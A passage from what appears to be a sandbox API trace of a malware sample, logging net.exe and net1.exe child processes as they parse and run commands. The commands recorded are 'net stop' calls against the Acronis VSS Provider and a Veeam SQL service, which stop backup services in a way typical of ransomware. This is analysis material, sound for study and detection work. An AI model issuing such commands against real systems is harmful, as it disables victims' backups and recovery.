dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x11 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START RPCSS\r\n", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x589630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x14 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START SCHEDULE\r", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x589630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x12 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START SERVER\r\n", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x589630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0xf [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START UPS\r\n", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x589630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x17 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START WORKSTATI", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x18 [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START\r\n[service", _MaxCount=0x13) returned 14 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x2a [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET STATISTICS\r\n[WO", _MaxCount=0x13) returned 14 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x15 [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET STOP\r\nservice\r\n", _MaxCount=0x13) returned 19 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x58 [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET TIME\r\n\r\n[\\\\comp", _MaxCount=0x13) returned -1 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x184 [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET USE\r\n[devicenam", _MaxCount=0x13) returned -2 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0xc7 [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET USER\r\n[username", _MaxCount=0x13) returned -2 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x47 [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET VIEW\r\n[\\\\comput", _MaxCount=0x13) returned -3 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0xc2 [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET\r\n [ ACCOUNTS", _MaxCount=0x13) returned 19 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x319 [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="SERVICES\r\nNET START", _MaxCount=0x13) returned -5 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x483 [0218.191] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="SYNTAX\r\nThe followi", _MaxCount=0x13) returned -5 [0218.191] LocalFree (hMem=0x589630) returned 0x0 [0218.191] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0xa86 [0218.192] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NAMES\r\nThe followin", _MaxCount=0x13) returned 4 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x54 [0218.192] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="\r\nFor more informat", _MaxCount=0x13) returned 97 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0xad [0218.192] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x2e [0218.192] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x7d [0218.192] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x26 [0218.192] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x19 [0218.192] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x1b [0218.192] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0xbe [0218.192] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x33 [0218.192] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0218.192] LocalFree (hMem=0x589630) returned 0x0 [0218.192] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x19 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0xc1 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x16 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x33 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x234 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x13 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x14 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x14 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x15 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x15 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x16 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x11 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.193] LocalFree (hMem=0x589630) returned 0x0 [0218.193] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x14 [0218.193] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.194] LocalFree (hMem=0x589630) returned 0x0 [0218.194] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x12 [0218.194] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.194] LocalFree (hMem=0x589630) returned 0x0 [0218.194] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0xf [0218.194] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.194] LocalFree (hMem=0x589630) returned 0x0 [0218.194] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x17 [0218.194] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.194] LocalFree (hMem=0x589630) returned 0x0 [0218.194] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x18 [0218.194] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.194] LocalFree (hMem=0x589630) returned 0x0 [0218.194] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x2a [0218.194] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0218.194] LocalFree (hMem=0x589630) returned 0x0 [0218.194] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,阰X,") returned 0x15 [0218.194] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0218.194] GetFileType (hFile=0x26c) returned 0x3 [0218.194] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x2cf718 | out: lpMode=0x2cf718) returned 0 [0218.194] GetConsoleOutputCP () returned 0x1b5 [0218.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0218.195] malloc (_Size=0x16) returned 0x802728 [0218.195] GetConsoleOutputCP () returned 0x1b5 [0218.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x802728, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0218.195] WriteFile (in: hFile=0x26c, lpBuffer=0x802728, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x2cf71c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf71c, lpOverlapped=0x0) returned 0 [0218.195] free (_Block=0x802728) [0218.195] LocalFree (hMem=0x589630) returned 0x0 [0218.195] NetApiBufferFree (Buffer=0x581c98) returned 0x0 [0218.195] NetApiBufferFree (Buffer=0x581cb0) returned 0x0 [0218.196] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Acronis VSS ProviderΓÇ¥ /y" [0218.196] exit (_Code=1) Process: id = "376" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x50c70000" os_pid = "0x6e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 551 os_tid = 0x734 Process: id = "377" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x550ff000" os_pid = "0x90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "376" os_parent_pid = "0x6e4" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 552 os_tid = 0x7f0 [0218.348] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32fdf8 | out: lpSystemTimeAsFileTime=0x32fdf8*(dwLowDateTime=0x4b55d6a0, dwHighDateTime=0x1d57a87)) [0218.348] GetCurrentProcessId () returned 0x90 [0218.348] GetCurrentThreadId () returned 0x7f0 [0218.348] GetTickCount () returned 0x1170204 [0218.348] QueryPerformanceCounter (in: lpPerformanceCount=0x32fdf0 | out: lpPerformanceCount=0x32fdf0*=33863298426) returned 1 [0218.349] GetModuleHandleA (lpModuleName=0x0) returned 0xc20000 [0218.349] __set_app_type (_Type=0x1) [0218.349] __p__fmode () returned 0x74eb31f4 [0218.349] __p__commode () returned 0x74eb31fc [0218.349] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc2ffe6) returned 0x0 [0218.349] __getmainargs (in: _Argc=0xc39064, _Argv=0xc3906c, _Env=0xc39068, _DoWildCard=0, _StartInfo=0xc39024 | out: _Argc=0xc39064, _Argv=0xc3906c, _Env=0xc39068) returned 0 [0218.349] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.349] GetConsoleOutputCP () returned 0x1b5 [0218.349] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc39080 | out: lpCPInfo=0xc39080) returned 1 [0218.349] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.353] sprintf_s (in: _DstBuf=0x32fdb0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0218.354] setlocale (category=0, locale=".437") returned="English_United States.437" [0218.356] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0218.356] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0218.356] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0218.356] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x32fb7c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0218.356] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x7c) returned 0x3f3c20 [0218.356] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0218.357] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32fd80 | out: Buffer=0x32fd80*=0x3f1c80) returned 0x0 [0218.357] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32fd80 | out: Buffer=0x32fd80*=0x3f1c98) returned 0x0 [0218.357] _fileno (_File=0x74eb2900) returned -2 [0218.357] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0218.357] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0218.357] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0218.357] _wcsicmp (_String1="config", _String2="stop") returned -16 [0218.357] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0218.357] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0218.357] _wcsicmp (_String1="file", _String2="stop") returned -13 [0218.357] _wcsicmp (_String1="files", _String2="stop") returned -13 [0218.357] _wcsicmp (_String1="group", _String2="stop") returned -12 [0218.357] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0218.357] _wcsicmp (_String1="help", _String2="stop") returned -11 [0218.357] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0218.357] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0218.357] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0218.357] _wcsicmp (_String1="session", _String2="stop") returned -15 [0218.357] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0218.357] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0218.357] _wcsicmp (_String1="share", _String2="stop") returned -12 [0218.357] _wcsicmp (_String1="start", _String2="stop") returned -14 [0218.357] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0218.357] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0218.357] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0218.357] _wcsicmp (_String1="accounts", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0218.357] _wcsicmp (_String1="computer", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0218.357] _wcsicmp (_String1="config", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0218.357] _wcsicmp (_String1="continue", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0218.357] _wcsicmp (_String1="cont", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0218.357] _wcsicmp (_String1="file", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0218.357] _wcsicmp (_String1="files", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0218.357] _wcsicmp (_String1="group", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0218.358] _wcsicmp (_String1="groups", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0218.358] _wcsicmp (_String1="help", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0218.358] _wcsicmp (_String1="helpmsg", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0218.358] _wcsicmp (_String1="localgroup", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0218.358] _wcsicmp (_String1="pause", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0218.358] _wcsicmp (_String1="session", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="sessions", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="sess", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="share", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="start", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="stats", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="statistics", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="stop", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="time", _String2="MSSQL$VEEAMSQL2008R2") returned 7 [0218.358] _wcsicmp (_String1="user", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0218.358] _wcsicmp (_String1="users", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0218.358] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0218.358] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0218.358] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.358] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.358] _wcsicmp (_String1="netpopup", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0218.358] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.358] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.358] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.358] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0218.358] _wcsicmp (_String1="work", 